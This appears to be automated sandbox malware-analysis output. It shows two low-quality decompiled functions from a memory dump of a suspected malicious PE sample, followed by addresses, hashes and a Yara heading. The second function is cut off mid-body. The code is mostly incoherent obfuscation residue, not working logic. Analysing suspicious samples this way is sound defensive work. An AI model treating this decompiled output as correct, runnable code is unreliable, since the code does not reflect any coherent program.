                                    C-Code - Quality: 51%
                                    			E0041D3C4(signed char __eax, signed char __ebx, void* __ecx, signed char __edx, void* __edi, signed int __esi) {
                                    				signed char _t60;
                                    				signed char _t67;
                                    				signed int _t72;
                                    				signed char _t75;
                                    				void* _t83;
                                    				signed int _t87;
                                    				void* _t91;
                                    				intOrPtr _t92;
                                    				intOrPtr _t93;
                                    
                                    				_t87 = __esi;
                                    				_t75 = __edx;
                                    				_t67 = __ebx;
                                    				_t60 = __eax;
                                    				_t72 = __ecx -  *0x986e44e9;
                                    				asm("rcl dword [0x21c63e15], 0x5f");
                                    				asm("sbb [0xc832470c], bh");
                                    				_t92 = _t91 - 0x5cc73b05;
                                    				_t93 =  *0x6065d097;
                                    				 *0x6065d097 = _t92;
                                    				if(_t92 < 0) {
                                    					__edi = __edi -  *0x50262079;
                                    					__esp = __esp ^  *0x8800de3f;
                                    					_t18 = __esi;
                                    					__esi =  *0xea5fc9db;
                                    					 *0xea5fc9db = _t18;
                                    					__edx = __edx + 1;
                                    					_pop(__edx);
                                    					__esi =  *0x9ef52769 * 0xc8aa;
                                    					 *0x52852a09 =  *0x52852a09 | __edx;
                                    					asm("sbb [0xd371aa1], ebx");
                                    					asm("adc [0xe91b5164], esi");
                                    					asm("adc edi, [0xe2e36d05]");
                                    					_t21 = __esp;
                                    					__esp =  *0x6505d799;
                                    					 *0x6505d799 = _t21;
                                    					__esp = 0xd791c9c5;
                                    					asm("sbb eax, 0x1fd8905");
                                    					asm("stosb");
                                    					 *0x822d05d7 =  *0x822d05d7 << 0x41;
                                    					asm("cmpsw");
                                    					 *0x905d796 =  *0x905d796 & 0xd791c9c5;
                                    					_push( *0xd798ab8d);
                                    					asm("adc edi, [0xf7fc7505]");
                                    					asm("rcr byte [0xdc03d7a8], 0x5d");
                                    					__edi = __edi +  *0x62041c07;
                                    					asm("rcr byte [0x48e8ef9], 0x7d");
                                    					__ecx = __ecx & 0x8e91906e;
                                    					__dl = __dl +  *0x9baae404;
                                    					asm("adc [0xab93048e], ebp");
                                    					__edi = __edi |  *0x12058e99;
                                    					asm("ror dword [0xd7a4e4cd], 0xd2");
                                    					 *0xfbede605 =  *0xfbede605 & __ebx;
                                    					asm("stosb");
                                    					 *0xeb4b05d7 =  *0xeb4b05d7 << 0x9c;
                                    					asm("sbb [0xc5a2b12], ah");
                                    					asm("movsb");
                                    					 *0x400751b3 =  *0x400751b3 ^ __al;
                                    					asm("sbb ecx, 0xb137986c");
                                    					 *0xa30751b5 =  *0xa30751b5 << 0x51;
                                    					asm("ror dword [0xb74ddb35], 0xe");
                                    					asm("adc ah, [0x2e0751b7]");
                                    					asm("sbb [0x7ac667d8], edx");
                                    					asm("ror dword [0xaa0851bf], 0xd9");
                                    					_pop(__ebp);
                                    					if(__bl != 0x10) {
                                    						 *0x98aed3dc =  *0x98aed3dc >> 0xbb;
                                    						 *0x1a08741e =  *0x1a08741e << 0xca;
                                    						__ecx = __ecx - 1;
                                    						__esi = __esi - 1;
                                    						asm("ror byte [0xb6b70c6], 0xa1");
                                    						if(__esi != 0) {
                                    							 *0xb1f40874 =  *0xb1f40874 ^ __ebx;
                                    							__esi = 0xa4cafdf4;
                                    							asm("sbb ah, [0xf7097422]");
                                    							asm("adc esp, 0x5fbec81d");
                                    							 *0xb6a1e809 =  *0xb6a1e809 & __ebx;
                                    							asm("cmpsw");
                                    							asm("rol dword [0xd6078d21], 0xe8");
                                    							_pop(__edi);
                                    							_t28 = __ebx;
                                    							__ebx =  *0xf46f3009;
                                    							 *0xf46f3009 = _t28;
                                    							 *0xe665d20a = __bh;
                                    							__esp = 0xd791c9c5 +  *0xc00a5fc5;
                                    							_push( *0xea34bb23);
                                    							__ecx =  *0xac2c1e81;
                                    							_pop(__ecx);
                                    							_pop(__ebx);
                                    							__eax = __eax -  *0x7b943727;
                                    							 *0x8303c85 =  *0x8303c85 << 0xba;
                                    							if( *0xa5e3d7f2 != __bl) {
                                    								 *0x740a6974 =  *0x740a6974 ^ 0xa4cafdf4;
                                    								asm("sbb edx, [0x92933c11]");
                                    								asm("ror dword [0x5c27cd2d], 0x58");
                                    								__ebx = __ebx + 0x3cc601ee;
                                    								__esi = 0xa4cafdf4 |  *0xbd74bd16;
                                    								asm("adc eax, [0xd41404b9]");
                                    								__esp = __esp -  *0x9adc0187;
                                    								__bl = __bl - 0x8a;
                                    								__eax = __eax &  *0x494c3d3b;
                                    								if(__eax > 0) {
                                    									__edi = __edi + 1;
                                    									_push( *0x6655596c);
                                    									__ecx = __ecx + 1;
                                    									__ebx = __ebx - 1;
                                    									__edi = 0xe60f97b8;
                                    									__ecx = __ecx &  *0x3abfd66c;
                                    									_pop(__ebx);
                                    									asm("movsw");
                                    									 *0xd184c7ed =  *0xd184c7ed << 0x9c;
                                    									 *0xb3aebf0 =  *0xb3aebf0 << 0x5b;
                                    									 *0x54aaa3e2 = __bh;
                                    									__ch = __ch ^ 0x000000e4;
                                    									__esi = __esi &  *0x47063029;
                                    									 *0xe3f435bd =  *0xe3f435bd - __ebx;
                                    									if( *0xe3f435bd > 0) {
                                    										 *0x46b70c76 = __eax;
                                    										asm("adc [0x89bf189a], edi");
                                    										 *0xba521c32 =  *0xba521c32 << 0x3b;
                                    										L1();
                                    										 *0xb107d7e8 =  *0xb107d7e8 << 0x6c;
                                    										__ebx = __ebx &  *0xfb4e0767;
                                    										__esp = __esp -  *0xe61651f8;
                                    										__eax = __eax - 1;
                                    										__esi = __esi ^  *0x5cdd1fcd;
                                    										__ecx =  *0x22fbdd6a * 0x1d31;
                                    										if(__ecx < 0) {
                                    											asm("ror dword [0x88199173], 0x2");
                                    											__ebx = __ebx + 1;
                                    											 *0x74d446a9 =  *0x74d446a9 << 0x4e;
                                    											 *0x8dcc11ba =  *0x8dcc11ba ^ 0xa4cafdf4;
                                    											 *0xa02ab0b4 =  *0xa02ab0b4 >> 0xdf;
                                    											if(0xa4cafdf4 >=  *0xcaff432b) {
                                    												asm("sbb [0xa5fdd470], ebx");
                                    												 *0xf76fc268 =  *0xf76fc268 & __eax;
                                    												__bl = __bl ^ 0x000000a2;
                                    												__cl = __cl +  *0x3ef9c028;
                                    												 *0x79e11a2a =  *0x79e11a2a >> 0x18;
                                    												asm("lodsb");
                                    												asm("rcr byte [0x9e825614], 0xe7");
                                    												 *0x7275833e =  *0x7275833e | __ecx;
                                    												_t37 = __dl;
                                    												__dl =  *0xec3cd02c;
                                    												 *0xec3cd02c = _t37;
                                    												asm("adc ebx, 0x3456cb17");
                                    												 *0x56479bc6 =  *0x56479bc6 << 0x2c;
                                    												_pop(__esi);
                                    												if(( *0x8422d4f5 & 0xd791c9c5) < 0) {
                                    													__edx =  *0x29ce17d * 0xd97c;
                                    													__edi =  *0x2dd6341e;
                                    													 *0x2dd6341e = 0xe60f97b8;
                                    													asm("ror dword [0xb53983dd], 0x3f");
                                    													asm("rol dword [0xefb51db8], 0x14");
                                    													_push(__ebp);
                                    													__al = __al ^ 0x000000a0;
                                    													__edi =  *0x2dd6341e + 1;
                                    													__ecx =  *0x10bc3b15;
                                    													if(__edi < 0) {
                                    														__esp =  *0x250b57d * 0x71ee;
                                    														_push(__edi);
                                    														 *0x6d2b1614 =  *0x6d2b1614 + __dh;
                                    														if( *0xbe5844eb < __eax) {
                                    															_push(__ebx);
                                    															__eax = __eax + 1;
                                    															asm("sbb [0x57dd3fdd], edx");
                                    															__ebx = 0xdefc78d4;
                                    															__eax = __eax + 1;
                                    															 *0x65dec5e1 =  *0x65dec5e1 ^ __ah;
                                    															__ebx = 0xffffffffdefc78d3;
                                    															_t43 = __eax;
                                    															__eax =  *0x7497e5fe;
                                    															 *0x7497e5fe = _t43;
                                    															if(__dl <=  *0x1645e86) {
                                    																__ecx = 0xebdc9e77;
                                    																__eax = __eax - 1;
                                    																 *0x3a143734 =  *0x3a143734 | __cl;
                                    																__bl = __bl & 0x000000b2;
                                    																asm("adc esi, [0x1345a181]");
                                    																_push(__edx);
                                    																 *0x38950a29 =  *0x38950a29 - __edi;
                                    																_push( *0x38bf0911);
                                    																asm("sbb eax, [0x71d30129]");
                                    																__esp = __esp -  *0xd21f9f8c;
                                    																_push( *0xed4b4523);
                                    																__edi = __edi + 1;
                                    																__edi = __edi + 1;
                                    																asm("adc esp, [0x3ecba91]");
                                    																__ebx = 0xffffffffe7244350;
                                    																_pop(__esp);
                                    																asm("rol byte [0x5982c7a0], 0xfe");
                                    																_push(__edi);
                                    																asm("rol dword [0xb5121829], 0x6a");
                                    																if(0xdefc78d4 == 0) {
                                    																	__eax = __eax - 1;
                                    																	 *0x566ea81c =  *0x566ea81c - __ch;
                                    																	 *0x3c1dcf28 =  *0x3c1dcf28 - __dl;
                                    																	__bh = 0xe5;
                                    																	asm("rcr byte [0x9e30a586], 0xdf");
                                    																	if( *0x3c1dcf28 < 0) {
                                    																		__eax = __eax & 0x816c9179;
                                    																		__ecx = 0xffffffff8687aeba;
                                    																		__bh = 0x000000e5 ^  *0x78d99ec6;
                                    																		__esi =  *0x8814b73d;
                                    																		_t54 = __esp;
                                    																		__esp =  *0x65841239;
                                    																		 *0x65841239 = _t54;
                                    																		 *0x8bb53308 =  *0x8bb53308 ^ __cl;
                                    																		_t55 = __dh;
                                    																		__dh =  *0xd5e840a;
                                    																		 *0xd5e840a = _t55;
                                    																		if( *0x8bb53308 != 0) {
                                    																			_t56 = __esi;
                                    																			__esi =  *0x3fc0c74;
                                    																			 *0x3fc0c74 = _t56;
                                    																			__esp = __esp + 1;
                                    																			__ecx = 0xffffffff8687aebb;
                                    																			__dh = __dh | 0x00000018;
                                    																			__esi =  *0x9de4b406;
                                    																			__bl =  *0x11d7f22a;
                                    																			__bh = __bh ^ 0x000000f6;
                                    																			asm("rcr byte [0x74a1b62a], 0x55");
                                    																			__cl =  *0x5b814bd2;
                                    																			_push(__edx);
                                    																			asm("movsw");
                                    																			 *0x3a1204c1 =  *0x3a1204c1 << 0x11;
                                    																			asm("ror dword [0xd0f9ffd3], 0x4d");
                                    																			__esi =  *0x9de4b406 |  *0x162e59bb;
                                    																			asm("lodsb");
                                    																			if(( *0x9de4b406 |  *0x162e59bb) < 0) {
                                    																				asm("sbb ecx, [0xa7f0d371]");
                                    																				asm("ror byte [0x3adde3f9], 0xd6");
                                    																				asm("rcr byte [0xc0a51618], 0xa3");
                                    																				asm("sbb cl, 0xc6");
                                    																				 *0x2b3a89a3 =  *0x2b3a89a3 | __eax;
                                    																				 *0xcc82863 =  *0xcc82863 + 0xe5;
                                    																				 *0xc04d321d =  *0xc04d321d ^ __edx;
                                    																				_push(__edi);
                                    																				_push( *0xb7b55c3f);
                                    																				asm("adc [0xdf8d8b3], ah");
                                    																				 *0xe7f2c516 =  *0xe7f2c516 >> 0xaa;
                                    																				asm("sbb esp, 0x18906d83");
                                    																				_push( *0x10435ef3);
                                    																				asm("sbb ebx, [0x7e8102b]");
                                    																				asm("sbb dl, 0x0");
                                    																				if( *0xe7f2c516 >= 0) {
                                    																					__esi =  *0xf6e0f67c * 0x978;
                                    																					asm("sbb ebx, 0x9641c78e");
                                    																					 *0x15d4b796 =  *0x15d4b796 & 0xebdc9e77;
                                    																					 *0xc4cb4610 =  *0xc4cb4610 + __dl;
                                    																					 *0xf6e0f67c * 0x978 - 1 =  *0xf6e0f67c * 0x978 - 1 + 0x6a4e6bcf;
                                    																					__ecx = 0xffffffff8687aebb +  *0xe67dd385;
                                    																					_pop( *0xa40341d);
                                    																					_pop( *0xaca6da13);
                                    																					 *0x5d45f01b =  *0x5d45f01b + __ebp;
                                    																					asm("rcl dword [0xd95848b8], 0xa");
                                    																					__ebp = __ebp |  *0xb626f629;
                                    																					__edi = __edi & 0x8159fd19;
                                    																					__esi =  *0xf6e0f67c * 0x00000978 - 0x00000001 + 0x6a4e6bcf & 0xbba5140f;
                                    																					asm("adc esi, 0xf6cd5abf");
                                    																					if(__esi == 0) {
                                    																						 *0xa4c69b7b =  *0xa4c69b7b ^ __eax;
                                    																						 *0x62b80e3c =  *0x62b80e3c << 0x84;
                                    																						__eax = 0x202d1113;
                                    																						 *0x1002229e =  *0x1002229e & __esi;
                                    																						if(0xdefc78d4 == 0x43fc4c9a) {
                                    																							__ebp = __ebp ^ 0xb658347a;
                                    																							 *0x8159fd19 = 0x202d1113;
                                    																							 *0x60478612 =  *0x60478612 - __dh;
                                    																							__ecx =  *0xdb57ee6a * 0xbabb;
                                    																							__esp =  *0x3d96c760 * 0xf9a7;
                                    																							__bl = __bl -  *0xb3adde3;
                                    																							__edx = __edx ^ 0xdb51ad03;
                                    																							 *0xa30f4562 =  *0xa30f4562 >> 0xe3;
                                    																							 *0x1630341e =  *0x1630341e << 0xe9;
                                    																							 *0x96ae87c9 =  *0x96ae87c9 & __al;
                                    																							 *0xb259403a =  *0xb259403a + __ah;
                                    																							__edx = __edx - 0x7208383d;
                                    																							 *0x3ea18492 =  *0x3ea18492 << 0xf4;
                                    																							 *0x4aec1cfb = 0xdefc78d4;
                                    																							__edi = __edi +  *0x920abadb;
                                    																							__edx =  *0x2951d9cc;
                                    																							__ebx =  *0xa4139abe;
                                    																							 *0xa4139abe = 0xffffffffe7244350;
                                    																							__eax = 0x202d1113 |  *0xb5aa0cb9;
                                    																							if(__edi == 0) {
                                    																								_pop(__esp);
                                    																								asm("sbb ecx, [0xd7f816eb]");
                                    																								__esp = 0x79cf2e0b;
                                    																							}
                                    																						}
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				while(1) {
                                    					L1:
                                    					 *0x3b97609 =  *0x3b97609 & _t96;
                                    					_t75 = _t75 & 0x000000b2;
                                    					if(_t75 != 0) {
                                    						continue;
                                    					}
                                    					L2:
                                    					_pop(_t83);
                                    					 *0x9b43710d =  *0x9b43710d >> 0x59;
                                    					_t87 = (_t87 & 0xec6820a1) +  *0x8dca0c2b + 1;
                                    					asm("ror dword [0xaa6cd8fc], 0x15");
                                    					 *0x74f8a804 =  *0x74f8a804 & _t67;
                                    					 *0x5b0f1f05 = _t67;
                                    					asm("adc ecx, 0x8c0ee43d");
                                    					 *0x2bfa1939 = _t93;
                                    					 *0xed478613 = _t75 &  *0x3e5484fc & 0x610dd78c;
                                    					_t72 = _t72 ^ 0xb71d1f16 |  *0x951ec62f;
                                    					 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
                                    					_t60 = _t60 + 2 &  *0x10814be3;
                                    					asm("sbb [0xf9062aa2], bl");
                                    					asm("adc bh, [0x41608722]");
                                    					_t96 = 0x7c387416;
                                    					 *0x809b9ef =  *0xed478613;
                                    					asm("adc esp, [0xf6102665]");
                                    					_t75 = _t83;
                                    					 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
                                    					 *0x70a50ad7 =  *0x70a50ad7 - _t75;
                                    					_push(_t83 + 1);
                                    					_t67 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
                                    					_t93 =  *0xab99e09;
                                    					 *0xab99e09 =  *0x2bfa1939;
                                    					if(_t67 >= 0) {
                                    						while(1) {
                                    							L1:
                                    							 *0x3b97609 =  *0x3b97609 & _t96;
                                    							_t75 = _t75 & 0x000000b2;
                                    							if(_t75 != 0) {
                                    								continue;
                                    							}
                                    							goto L2;
                                    							do {
                                    								do {
                                    									do {
                                    										goto L1;
                                    									} while (_t75 != 0);
                                    									goto L2;
                                    								} while (_t67 >= 0);
                                    								goto L3;
                                    							} while (_t72 >= 0);
                                    							asm("rol byte [0x4c68f784], 0x8d");
                                    							_pop(_t60);
                                    							 *0x206342b0 =  *0x206342b0 << 0x5c;
                                    							asm("rcr byte [0x4eac7ee7], 0x86");
                                    							_t67 =  *0x91e576a * 0xa901;
                                    							_push(0x2f663016);
                                    							_t75 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
                                    							asm("sbb ebx, [0x31369c6e]");
                                    							_t96 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
                                    							_t87 = _t87 - 1;
                                    							if(_t87 != 0) {
                                    								continue;
                                    							} else {
                                    								asm("adc esi, [0xcdd02e7a]");
                                    								_t60 = _t60 + 0x347ded17;
                                    								if(0x2f663016 != 0) {
                                    									continue;
                                    								} else {
                                    									 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
                                    									 *0xb06d5ff4 =  *0xb06d5ff4 | _t67;
                                    									 *0x591ac92e =  *0x591ac92e << 0xcc;
                                    									 *0x95d3f14 = _t75;
                                    									asm("lodsb");
                                    									 *0xfd7e63c6 =  *0xfd7e63c6 | _t60;
                                    									 *0xb5e49981 =  *0xb5e49981 + _t87 - 0x520b7c0f;
                                    									asm("sbb [0xe8fcc704], ah");
                                    									return _t60 - 0x8016fbf1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L3:
                                    					 *0xb99f09b7 =  *0xb99f09b7 ^ _t67;
                                    					asm("adc eax, [0xf7196c7]");
                                    					 *0x1262affc =  *0x1262affc >> 0xdc;
                                    					_t72 = _t72 -  *0x1c4badca;
                                    					asm("rcr dword [0x92772366], 0x3f");
                                    					_t75 = 0x7c387416;
                                    					asm("rcr dword [0xd5227b61], 0x58");
                                    					_t60 =  *0xfd3b2b3a;
                                    					 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
                                    					L1:
                                    					 *0x3b97609 =  *0x3b97609 & _t96;
                                    					_t75 = _t75 & 0x000000b2;
                                    				}
                                    			}












                                    0x0041d9ad
                                    0x0041d9ad
                                    0x0041d9b3
                                    0x0041d9ba
                                    0x0041d9c6
                                    0x0041d9c7
                                    0x0041d9cd
                                    0x0041d9cd
                                    0x0041d9ba
                                    0x0041d93d
                                    0x0041d919
                                    0x0041d8b3
                                    0x0041d85b
                                    0x0041d810
                                    0x0041d7e1
                                    0x0041d7bf
                                    0x0041d749
                                    0x0041d716
                                    0x0041d6f6
                                    0x0041d6c8
                                    0x0041d66b
                                    0x0041d643
                                    0x0041d602
                                    0x0041d5b2
                                    0x0041d578
                                    0x0041d50b
                                    0x0041d4e8
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x0041cfb1
                                    0x0041cfb7
                                    0x0041cfb8
                                    0x0041cfd3
                                    0x0041cfd5
                                    0x0041cfe8
                                    0x0041cfee
                                    0x0041d000
                                    0x0041d006
                                    0x0041d00c
                                    0x0041d012
                                    0x0041d01f
                                    0x0041d026
                                    0x0041d02c
                                    0x0041d047
                                    0x0041d04d
                                    0x0041d053
                                    0x0041d059
                                    0x0041d05f
                                    0x0041d066
                                    0x0041d06d
                                    0x0041d073
                                    0x0041d074
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d080
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x00000000
                                    0x0041cfa6
                                    0x0041d0f8
                                    0x0041d0ff
                                    0x0041d106
                                    0x0041d10d
                                    0x0041d11a
                                    0x0041d124
                                    0x0041d125
                                    0x0041d12b
                                    0x0041d131
                                    0x0041d137
                                    0x0041d138
                                    0x00000000
                                    0x0041d13e
                                    0x0041d13e
                                    0x0041d144
                                    0x0041d149
                                    0x00000000
                                    0x0041d14f
                                    0x0041d155
                                    0x0041d163
                                    0x0041d169
                                    0x0041d170
                                    0x0041d191
                                    0x0041d192
                                    0x0041d198
                                    0x0041d19e
                                    0x0041d1a9
                                    0x0041d1a9
                                    0x0041d149
                                    0x0041d138
                                    0x0041cfa6
                                    0x0041d086
                                    0x0041d090
                                    0x0041d09c
                                    0x0041d0a9
                                    0x0041d0b6
                                    0x0041d0bc
                                    0x0041d0c3
                                    0x0041d0c4
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfac

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c0a262bcd4ea6ca4a2aa97afdbf66d833422cc74f92fba0f3151d65d9c52738
                                    • Instruction ID: ec95f877ae67b03f65726077f90bae4a517d53838de35b86111ee8a24a58eff7
                                    • Opcode Fuzzy Hash: 6c0a262bcd4ea6ca4a2aa97afdbf66d833422cc74f92fba0f3151d65d9c52738
                                    • Instruction Fuzzy Hash: 60124372948791CFDB16CF38D98AB913FB2F392720708424EC5A1975D2D738256ACF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E0041E5F4(signed char __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                    				void* _v3;
                                    				signed char _t42;
                                    				signed int _t44;
                                    				signed int _t50;
                                    				signed int _t58;
                                    				intOrPtr _t63;
                                    				signed int _t65;
                                    				signed char _t68;
                                    				signed int _t69;
                                    				signed char _t71;
                                    				signed int _t74;
                                    				signed int _t79;
                                    				signed int _t95;
                                    				signed int _t101;
                                    				signed int _t102;
                                    
                                    				_t79 = __esi;
                                    				_t74 = __edi;
                                    				_t70 = __edx;
                                    				_t65 = __ecx;
                                    				_t50 = __ebx;
                                    				_t41 = __eax;
                                    				goto L1;
                                    				do {
                                    					do {
                                    						do {
                                    							do {
                                    								do {
                                    									do {
                                    										do {
                                    											do {
                                    												do {
                                    													do {
                                    														do {
                                    															do {
                                    																L1:
                                    																_t41 = _t41 & 0xce083135;
                                    																asm("sbb ebx, 0xfb3676c");
                                    																_t79 = _t79 + 1;
                                    																 *0x834f8af8 =  *0x834f8af8 >> 0x3b;
                                    															} while (( *0xc840cd8c & _t95) <= 0);
                                    															_t95 =  *0xf8c4d47e * 0x9a77;
                                    															asm("rol dword [0x281d2ac8], 1");
                                    															 *0x688255f8 = _t65;
                                    															 *0x5bee4be2 =  *0x5bee4be2 >> 0xb7;
                                    															asm("ror dword [0x80e6cfd6], 0xb3");
                                    															 *0x3bb8a5c0 =  *0x3bb8a5c0 & _t41;
                                    															_t50 = _t50 + 0x00000001 ^  *0x34db4139;
                                    															asm("adc ebp, 0xac18d8db");
                                    															_t65 = _t65 +  *0x6ce69d6d - 1;
                                    															_t70 = _t70 + 1;
                                    															 *0xa74e77eb =  *0xa74e77eb - _t65;
                                    															 *0xf94e2fa =  *0xf94e2fa >> 0x4d;
                                    														} while ( *0xa74e77eb >= 0);
                                    														 *0xd56f2929 = _t79;
                                    														asm("adc dh, [0xc56e361c]");
                                    														asm("adc [0x4cc77868], ebp");
                                    														asm("sbb ah, 0x8");
                                    														asm("rol dword [0x36d03f68], 0x1f");
                                    														_pop(_t41);
                                    														L1();
                                    														 *0xa3feebe8 =  *0xa3feebe8 & _t79;
                                    														asm("rcr byte [0x2ed1bf08], 0x55");
                                    														 *0xc36be062 =  *0xc36be062 & _t74;
                                    														asm("sbb edx, [0xc1b7e79a]");
                                    														asm("sbb [0x9db73b02], bh");
                                    														 *0xee9ab5f2 =  *0xee9ab5f2 | _t65;
                                    														_t50 =  *0x529a8abb &  *0xad498329 ^ 0x000000a8 ^  *0x5ac50894;
                                    														_t79 =  *0xc3cc8423;
                                    														_pop(_t65);
                                    														 *0x27858fbb =  *0x27858fbb & _t50;
                                    														asm("sbb dh, 0x20");
                                    														 *0x84ebfcd5 = 0x7f000973;
                                    													} while ( *0x27858fbb <= 0);
                                    													 *0x47dfe576 =  *0x47dfe576 | _t74;
                                    													_pop(_t79);
                                    													 *0x59abee3 =  *0x59abee3 + _t65;
                                    													_t65 = _t65 +  *0xfc72bf0b;
                                    													_push( *0xffd981b8);
                                    													asm("scasd");
                                    													 *0xbb0d2e66 = _t74;
                                    													asm("adc dh, 0xb7");
                                    													_t50 = _t50 - 1;
                                    													_t95 = _t95 - 0x52d9180b;
                                    												} while ((_t41 & 0x0000001c) != 0);
                                    												 *0x6faf4875 = _t50;
                                    												 *0x9e03d9c6 =  *0x9e03d9c6 ^ _t50;
                                    												asm("movsb");
                                    												asm("adc esp, 0x21dfc73e");
                                    												asm("sbb ebx, [0xa2cc7915]");
                                    												_t65 = (_t65 | 0x7d2e6405) - 0x84;
                                    												asm("movsb");
                                    												_t74 = _t74 &  *0x49f2b4a1;
                                    												 *0x3a325326 =  *0x3a325326 - _t95;
                                    												_t50 = _t50 |  *0x2f719ed3;
                                    												asm("lodsb");
                                    												_t41 = _t41 ^  *0x916a6b2;
                                    											} while (_t41 < 0);
                                    											 *0xa848b78 =  *0xa848b78 + _t74;
                                    											_pop( *0xcfef3c6c);
                                    											asm("adc ebp, [0xf970f9f5]");
                                    											_pop(_t42);
                                    											 *0xb3d28cf9 =  *0xb3d28cf9 >> 0xbb;
                                    											 *0xe01aca1c =  *0xe01aca1c | _t65;
                                    											 *0x750ee711 =  *0x750ee711 + _t65;
                                    											_pop(_t71);
                                    											 *0xb671dcec =  *0xb671dcec << 0xc6;
                                    											 *0x98574e94 =  *0x98574e94 & 0x01c869c2;
                                    											_pop(_t68);
                                    											_push( *0x2f21a91f);
                                    											 *0xbd57bfd8 =  *0xbd57bfd8 << 0x73;
                                    											_t44 = _t42 ^  *0x2540fc2a |  *0x99da1818;
                                    											 *0xb00e43e1 =  *0xb00e43e1 << 0xa2;
                                    											asm("stosd");
                                    											asm("rol byte [0x23cccf32], 0xbd");
                                    											_t74 = _t74 |  *0xba7f26ea;
                                    											 *0xf77a380c =  *0xf77a380c ^ _t71;
                                    											 *0xc8dab9e7 =  *0xc8dab9e7 - _t68;
                                    											_t79 =  *0x606c8f60 * 0x4bdb - 1;
                                    											asm("stosd");
                                    											 *0x7403ca80 =  *0x7403ca80 ^ _t44;
                                    											_t50 =  *0xffe468e +  *0xdb883fc;
                                    											_t41 = _t44 &  *0xceb46c13;
                                    											_t70 = 0x5df4c40f;
                                    											_t65 = _t68 |  *0xf04ead10;
                                    											asm("adc [0x1c0cdfb3], cl");
                                    											 *0xf6f1c7d1 =  *0xf6f1c7d1 - _t74;
                                    											asm("adc esi, 0xdcefb6be");
                                    											asm("sbb edx, [0xae8d3325]");
                                    											asm("sbb [0xf64cbc], esi");
                                    											 *0xf4689886 =  *0xf4689886 | _t41;
                                    											_t95 = _t79;
                                    										} while ( *0xf4689886 < 0);
                                    										_t69 =  *0xaeb0ea7c * 0xf9ce;
                                    										_push(_t69);
                                    										asm("sbb eax, [0xd177021b]");
                                    										 *0xa45846a8 =  *0xa45846a8 ^ _t41;
                                    										_t70 = 0x5df4c40f +  *0x5d680fc5;
                                    										 *0x35e87b1c = _t41;
                                    										_t65 = _t69 & 0x65645917;
                                    										asm("sbb [0xeac7802d], ecx");
                                    										_t50 = _t50 ^  *0x645d04a2;
                                    										 *0xd5c27c6c =  *0xd5c27c6c & _t74;
                                    										_push(_t41);
                                    										_t15 = _t95;
                                    										_t95 =  *0x8aace716;
                                    										 *0x8aace716 = _t15;
                                    										asm("adc [0x282cd3a8], dl");
                                    									} while ( *0xd5c27c6c < 0);
                                    									 *0x741a6870 =  *0x741a6870 ^ _t79;
                                    									_t74 = _t74 + 0xf0f76fa3;
                                    									 *0xb1e62f20 =  *0xb1e62f20 & _t70;
                                    									asm("movsw");
                                    									_t95 = 0x280943c5 &  *0x18ea01ee;
                                    									asm("rcl dword [0x613d0e0e], 0x16");
                                    									asm("rcr dword [0x3abd70ed], 0x18");
                                    									_t58 =  *0x719a3229;
                                    									 *0x719a3229 = _t50 | 0xa6d8cc27;
                                    									 *0x30a39dd7 = _t58;
                                    									 *0x6e8c39b7 =  *0x6e8c39b7 + _t41;
                                    									_push(_t41);
                                    									asm("sbb bl, [0xac1bc12c]");
                                    									_t50 = _t58 |  *0xde2afba1;
                                    									_t41 = _t41 +  *0x99ad4402;
                                    								} while (_t41 >= 0);
                                    								 *0x707b7279 =  *0x707b7279 ^ _t65;
                                    								 *0xce9323b4 = _t41;
                                    								asm("sbb bh, [0x46d7b0b3]");
                                    								_t70 = _t70 + 1;
                                    								asm("sbb edi, 0x92495a6e");
                                    								_pop(_t79);
                                    								_pop(_t101);
                                    								asm("rcr dword [0xc59abcf3], 0x29");
                                    								_t41 = 0xffffffffbdc58cf7;
                                    								asm("adc ebx, [0xf6782791]");
                                    								 *0x693a4106 =  *0xc3ec7a66;
                                    								_t63 = ((_t50 |  *0xd05669b5) +  *0xb5c30a1a &  *0x1c102886) - 0xec7caa98 + 1;
                                    								asm("rol byte [0xdada57f6], 0x70");
                                    								 *0x4da63c13 = _t63;
                                    								_t50 = _t63 + 1 -  *0x440d92ea;
                                    								asm("sbb dl, [0xfbb1d5b2]");
                                    								asm("lodsd");
                                    								_t95 = _t101 |  *0x3affe9ef;
                                    								asm("cmpsb");
                                    								_t65 = _t65 & 0x000000b0;
                                    								 *0xf70b8b30 =  *0xf70b8b30 & 0xffffffffbdc58cf7;
                                    								asm("rcr byte [0x3ba13710], 0x8f");
                                    								_t74 = (_t74 | 0xa9c2963e) - 1 -  *0x8eaabace;
                                    								asm("cmpsw");
                                    							} while (_t74 <= 0);
                                    							_t50 =  *0xe346017e * 0x5080;
                                    							_t65 =  *0x7c8a2abd;
                                    							_push(0xbdc58c35);
                                    						} while (_t50 < 0);
                                    						 *0xc7033378 =  *0xc7033378 >> 0xf0;
                                    						_t70 = _t70 + 0x51469ec0;
                                    						_t65 = _t65 - 2;
